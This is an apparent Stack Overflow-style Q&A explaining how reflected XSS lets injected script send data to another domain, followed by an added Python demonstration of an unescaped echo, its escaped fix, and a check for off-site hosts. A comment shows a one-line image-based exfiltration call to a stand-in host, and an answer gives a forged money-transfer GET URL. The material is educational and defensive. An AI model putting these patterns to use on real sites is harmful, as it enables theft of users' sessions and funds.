
I read How does XSS work? but I still don't get this point.

Scenario:

  1. I run the mybank.com site and an end user logs in to the site.
  2. Someone "injects" malicious code by submitting a GET request whose content gets printed or echoed back.
  3. As far as I know, your requests always go to mybank.com, because cross-domain requests are disallowed by default.
  4. So how do I actually manage to send contents to mysite.com, assuming mysite.com is a malicious user's site that wants to exploit mybank.com's XSS vulnerabilities?

If I can't change point 3, then probably there is no way I could do 4. But if 4 can be done, is it done by changing window.location.href or document.location, i.e. breaking assumption 3? Does it now behave like it is mysite.com?

Or is there any other way you could hijack the site without 4?

Nishant

2 Answers


Once the code gets injected, there is no "security", the browser thinks that all the code that is running on the site belongs there.

Think about what you can do in your own web pages when you code. You can have JavaScript click on buttons, submit forms, click links, etc. You can have the code inject elements, more code, remove things, etc.

So imagine what a developer can do to an email app or a bank account. They could send emails or transfer money. Just need to fire the right steps.

Now how can they transfer information out? As simple as making a GET or POST request. They set up an endpoint somewhere and make a request to it. The endpoint logs the data. Requests can be made with AJAX, images, form submissions, loading up iframes, etc.

Cross Domain requests are allowed if the other domain you want to talk to allows it.

epascarello
  • If hypothetically cross-domain requests are NOT allowed, then there is nothing you can do, right? Of course achieving this might be hard, but the question is a bit theoretical, to understand what actually makes this possible. Send emails or transfer money are good examples. It's basically someone else authorizing themselves as you and the dangers associated - one form of hacking. – Nishant Nov 26 '14 at 13:41
  • You can always make cross domain calls! That is how we link to images, CDNs for script/css files, submit forms to other domains, etc. Cross domain means nothing with XSS. – epascarello Nov 26 '14 at 13:44
  • Correct! I thought about this but somehow forced myself to think it's not cross domain :-) while it really is. Just not via AJAX, right? – Nishant Nov 26 '14 at 13:45
  • `var img = document.createElement("img"); img.src="https://example.com/?data=12309821309812309812038213";` I just sent data to another domain with that call when it is run. If the person wants to use Ajax, they can just set up their server to allow cross domain calls. They do not have to worry about the "bank" site not allowing it, since they are not making calls to the bank; the "bank" is making the requests. All cross domain is a handshake with CORS. It is a bouncer at a bar/club that either lets them in to read data or denies entry. – epascarello Nov 26 '14 at 13:49

GET requests are simple requests you can make just by loading a URL. Suppose the vulnerable page allows you to send a money order to someone using a pure GET request like this:

http://bank.com/sendmoney?user=attacker&amount=everything

Just navigating to that URL means you want to send all of your money to the attacker (lol)... Suppose the only security is that you must be logged into bank.com.

Now suppose you visit this attacker's website while logged into bank.com and he has an img element with the src attribute set to that URL. Just by visiting the page you've sent all of your money to the attacker. That's it in a nutshell.

Usually XSS means you are able to actually inject code directly onto the page, because the logic used on the server side echoes the contents of a GET-request variable directly onto the page without sanitizing the input. Hopefully this helps you understand a little better.

Jonathan Gray
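The server-side echo described in the answers above, as an added example that is not part of this thread: a constructed Python handler that reflects a GET parameter unescaped, beside the escaped version, plus a small check that lists which foreign hosts the rendered page would make the browser request. The parameter name, hostnames and the injected value are all assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed sample: an injected value modelled on the image-based
# exfiltration discussed in the comments. The host and data are placeholders.
INJECTED = '<img src="https://example.com/?data=SESSION_DATA_PLACEHOLDER">'
QUERY = urlencode({"name": INJECTED})  # what ?name=... looks like on the wire


def reflect_unescaped(query_string: str) -> str:
    """Vulnerable: the parameter is pasted into the HTML verbatim, so any
    markup in it becomes part of the page and acts with the bank's origin."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<p>Hello, {name}</p>"


def reflect_escaped(query_string: str) -> str:
    """Hardened: html.escape turns < > & \" ' into entities, so the browser
    shows the text instead of creating an <img> that fetches another origin."""
    name = parse_qs(query_string).get("name", [""])[0]
    return f"<p>Hello, {html.escape(name, quote=True)}</p>"


def foreign_origins(rendered_html: str, own_host: str) -> list[str]:
    """Defender-side check: hosts other than own_host referenced by src=""
    attributes in the rendered page. A simple attribute scan, not an HTML parser."""
    hosts = []
    for match in re.finditer(r'src="([^"]+)"', rendered_html):
        host = urlparse(match.group(1)).hostname
        if host and host != own_host:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    print(reflect_unescaped(QUERY))   # contains a live <img> pointing off-site
    print(foreign_origins(reflect_unescaped(QUERY), "mybank.com"))
    print(reflect_escaped(QUERY))     # &lt;img ...&gt; rendered as plain text
    print(foreign_origins(reflect_escaped(QUERY), "mybank.com"))
```

The unescaped rendering references example.com, which the browser would fetch with no cross-domain check at all; the escaped rendering references nothing.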